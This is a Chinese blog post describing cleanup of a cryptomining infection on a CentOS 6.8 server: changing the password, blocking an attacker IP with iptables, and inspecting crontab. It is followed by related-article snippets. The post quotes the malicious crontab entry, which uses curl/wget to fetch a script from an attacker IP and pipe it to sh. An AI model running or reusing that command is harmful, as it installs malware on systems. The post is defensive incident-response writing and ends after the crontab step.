centos6.8服务器中了挖矿程序病毒的解决方法

最新推荐文章于 2023-04-03 14:44:40 发布
最新推荐文章于 2023-04-03 14:44:40 发布
阅读量966 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/emtit2008/article/details/100536077
版权

在收到阿里云的安全警告2条

1、异常登录-ECS在非常用地登录

2、恶意进程(云查杀)-挖矿程序

根据提示分析,当有异常登录时,基本上是服务器的密码被破解了,所以第一步是先修改服务器的密码

输入命令passwd 回车输入新的密码

第二步、查封可疑IP,根据阿里云的提示使用iptabes禁止可疑IP的连接

iptables -I INPUT -s 68.183.140.39 -j DROP

查看一下是否增加进去了

iptables -L -n -v

第三步、查杀对应的病毒,大部分的病毒无非通过crontab和常驻内存进行复制;所以我们先去查一下crontab

输入命令crontab -e看一下是否有可疑的命令,我的查找到如下的命令

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

 

PHP黄建文
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VirtualBox下Centos6.8网络配置教程
09-15
主要为大家详细介绍了VirtualBox下Centos6.8网络配置教程,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
CentOS 6.8 NFS 文件共享设置的方法
09-15
主要介绍了CentOS 6.8 NFS 文件共享设置的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
CentOS6.8-64位系统-百度云盘链接
05-19
CentOS6.8-64-百度云盘链接
CentOS 6.8 安装vsftpd的方法步骤
01-10
vsftpd是“very secure FTP daemon”的缩写,是一个完全免费的、开发源代码的ftp服务器软件。 vsftpd是一款在Linux发行版本最受推崇的FTP服务器程序,小巧轻快、安全易用、支持虚拟用户、支持带宽限制等功能。 系统环境:CentOS 6.8 64位 vsftpd版本 :vsftpd-2.22-21.el6.x86_64 1.执行命令 yum -y install vsftpd ps:(1)是否使用sudo权限执行根据具体环境来决定;(2)rpm -qa | grep vsftpd可通过这个检查是否已安装vsftpd;(3)默认配置文件在/etc/vsft
centos6.8-离线安装docker环境所需的rpm
08-30
centos6.8,用于离线安装docker环境所需的rpm
ECS 服务器出现了异地登录怎么办?
云大牛的博客
12-06 2706
如果出现异地登录解决办法如下: 首先确认一下在异地登录的时间点自己或者其他管理员是否有过登录操作。 如果不是用户或者合法管理员操作,可以执行以下操作: 建议立即更改用户密码,并对服务器进行检查。 排查肉鸡问题。 使用安全组功能设置只允许指定的 IP 登录,避免未授权用户连接服务器。 ...
Centos挖矿病毒处理过程
2301_77388529的博客
04-03 837
服务器系统毒后一般会出现异常进程,负载高,CPU占用高,带宽跑满的情况, 为防止你的服务器招建议服务器 FTP 数据库 网站 Redis等请勿使用简单的密码 轻的只会跑资源 严重的删网站删库 下面说下毒的处理流程。建议:处理完成之后备份好数据重装系统,病毒作者可能还留有后门,重装系统后加强密码 服务器管理 安装相应的防御软件 希望该教程能让你get到技能。rm /bin/dhpcd ###确定该进程不是自己安装的删除该文件,不确定可以先mv到其他目录。直接使用”dd”,删除计划任务。
centos8 处理挖矿程序攻击
Wangthebest的专栏
05-30 1342
ll /usr/bin/top* top命令被修改,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装。 yum remove e2fsprogs #rpm -qa|grep e2fsprogs yum -y install e2fsprogs #yum install e2fsprogs-1.45.6-2.el8.x86_64 解锁TOP文件并恢复 chattr -i top mv top top.rm mv top.lanigiro top 4.
挖矿病毒zz.sh——记一次linux(centos)成为矿机后的排查与修复过程
热门推荐
m0_37313888的博客
09-27 1万+
我们工作组的主机集群某天被发现cpu利用率600%多,显然被种了后门来挖矿。写一下这篇文章来记录排查过程遇到的问题。 1.怎么发现变矿机? 1)top 发现cpu炸了。这个也是常见的查看方法 2) netstat -natp 发现有几个异常的tcp连接,一查ip,发现是俄罗斯,荷兰的ip,估计主机被人种后门了 2.具体流程 crontab -l ,发现果然有一分钟一次的定时任务,...
创建阿里云服务器ECS)实例后的登录问题
任玥的博客
01-27 8935
创建实例后,系统会给我们一个默认6位连接密码,但是要注意,这个密码只是在该实例的【远程连接】使用(如下图) 刚开始我以为这6位密码就是远程桌面连接时的密码,原来不是!! 那远程桌面连接用户名和密码是多少? 不知道的也没关系,我们可以自己设置登录密码。 (1)修改连接密码(如果忘记了的话),【更多】-->【密码/密钥】-->【修改远程连接密码】如下图 修改好6位密码后...
阿里云服务器如何登录?阿里云服务器的三种登录方法 ...
weixin_34104341的博客
04-22 2026
购买阿里云ECS服务器后如何登录?场景不同,云吞铺子总结大概有三种登录方式: 登录ECS服务器控制台 在ECS服务器控制台用户可以更改密码、更换系统盘、创建快照、配置安全组等操作如何登录ECS服务器控制台? 1、先登录到阿里云ECS服务器控制台 2、点击顶部的“控制台” 3、通过左侧栏,切换到“云服务器ECS”即可,如下图所示 通过EC...
《阿里云服务器教程3》:手机移动端如何远程登录阿里云服务器ECS
云计算
06-01 3291
目录1、安卓手机端2、苹果手机端▶相关文章:关于如何在手机端登录阿里云服务器,分为两种情况,一是安卓手机,而是苹果手机。可以下载JuiceSSH 这个app,进行远程连接linux云服务器。JuiceSSH 下载地址:JuiceSSH下载安装之后,在手机上打开JuiceSSH,点击“快速连接”,选择SSH,输入root@ip地址,如下图所示 接着,输入root用户的密码接着就连接成功了 可以在App Store市场搜索“Termius: Terminal & SSH client”,下载安装。打开这个应用,
第一次如何登陆阿里云ECS服务器
你,若盛开的专栏
02-08 7861
1、准备工作:设置需要登陆的实例好安全组 登陆自己的阿里云控制台,进入ECS服务器实例管理详情,点击“本实例安全组” 2、进入安全组设置页面,选择“配置规则” 3、进入安全组规则页面,选择“快速创建规则” 选择好常用端口,SSH、HTTP、HTTPS、MYSQL等 并将授权对象设置为:0.0.0.0/0 4、登陆自己的阿里云控制台,进入ECS服务器实例管理详情,点击“更多”,选择“重置实例...
记录解决阿里云ES服务器提示挖矿程序
张先生
12-11 4341
前言 突然收到阿里云的短信提醒,说服务器出现了恶意挖矿程序,还好这台上都是测试服务器,之前也做了数据备份,可以放心去整,不过还是得小心严重操作前记得备份下 处理过程 1、检查服务器负载与CPU利用率,确定挖矿程序进程 执行命令: top , 如图: 发现有一个 network01的东西占用cup达到了87%,但我在服务器器根目录下的 tmp 下并没有看到这玩意 由上确定了PID进程号,查看进行所在的目录。执行命令, 并没有明确的位置,可以看到可执行文件链接 ll /proc/进程ID 然
解决:阿里服务器挖矿程序攻击
春风化雨
10-11 1078
1、问题: 恶意进程(云查杀)-挖矿程序待处理 备注处理 执行命令的进程:/tmp/Jonason 恶意文件md5:24d10d255de2dc9ff367e03625d7c4d5 进程id:26,247 描述:通常黑客入侵后会植入挖矿程序赚取收益,该类程序占用CPU等资源,影响用户正常业务,危害较大。且该程序可能还存在自删除行为,或伪装成系统程序以躲避检测。如果发现该文件不存在,请检...
centos7系统服务器 ---- kworkerds挖矿病毒排查过程
跪下叫我怕怕的博客
03-04 7577
kworkerds挖矿病毒排查过程 2019年3月2日晚上,收到报警邮件,出现多台服务器cpu使用率超过百分之九十五现象。登录服务器查看,发现存在cpu使用率超高的进程kworkerds 的存在,不用多说,这个名字只要是接触过挖矿病毒的运维人员都知道,那么下面开始排查及清理。 了此病毒服务器有两种(目前发现)情况: 第一种,使用top命令可以直接查看到是哪个进程在消耗CPU资源; 第二种,使用...
Centos7 处理挖矿病毒初探
wolf1105的博客
08-15 7075
1、首先查看top命令下占用cpu最高的是什么进程 #top #lsof 进程名 如果是挖矿程序可以看到明显的异常 具体lsof的用法 请参考 https://www.cnblogs.com/sparkbj/p/7161669.html 确定挖矿程序的路径以后,先kill掉进程,再删除文件 #kill -9 555 #rm -rf /tmp/wakuang.sh 2、清理定时任务 一般只...
阿里云服务器web应用安全-异常登录
gstc110的专栏
06-19 1948
最近刚在阿里云ecs上搭了java web应用,刚上线几天,就发现每天都有root,mysql等用户的异常登录。经过查资料发现如下解决办法: 禁止指定用户远程ssh登录: 修改/etc/pam.d/sshd文件,添加如下一行代码。 然后创建/etc/sshdusers文件,添加禁止远程ssh登录的用户: 然后再用这些用户ssh登录,会发现权限不允许的错误。而
centos6.8 百度资源
最新发布
07-18
CentOS是一个基于Linux的操作系统,而CentOS 6.8是其的一个发行版本。用户可以通过百度资源来获取关于CentOS 6.8的相关资料和资源。 在百度资源,用户可以找到CentOS 6.8的官方网站、官方文档、官方论坛等。官方网站是用户获取CentOS 6.8 ISO镜像文件的最佳途径。用户可以通过官方文档了解CentOS 6.8的安装指南、配置手册、系统管理等内容。官方论坛是用户交流与分享CentOS 6.8的问题、经验和建议的平台。 此外,用户在百度资源也可以找到其他第三方网站和技术文章,提供了更多关于CentOS 6.8的资源和资料。这些比如CentOS文社区、博客等,都可以帮助用户深入了解CentOS 6.8的功能和使用方法。 总之,通过百度资源,用户能够方便地获取与CentOS 6.8相关的资料、下载ISO镜像、了解配置与管理等技术文档,以及参与论坛交流等,提高自身对CentOS 6.8操作系统的理解和应用能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值